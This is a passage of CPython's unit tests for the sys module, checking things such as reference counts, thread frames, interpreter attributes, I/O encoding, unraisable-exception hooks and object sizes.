def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
        # Spawn a thread that blocks at a known place. Then the main
        # thread does sys._current_exceptions(), and verifies that the
        # exceptions returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
        # has been set to a non-existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
        # has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just the class name, and that the module name appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('6Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('6Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
def func():
return sys._getframe()
x = func()
check(x, size('3Pi3c8P2iciP'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P4c8P2iciP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
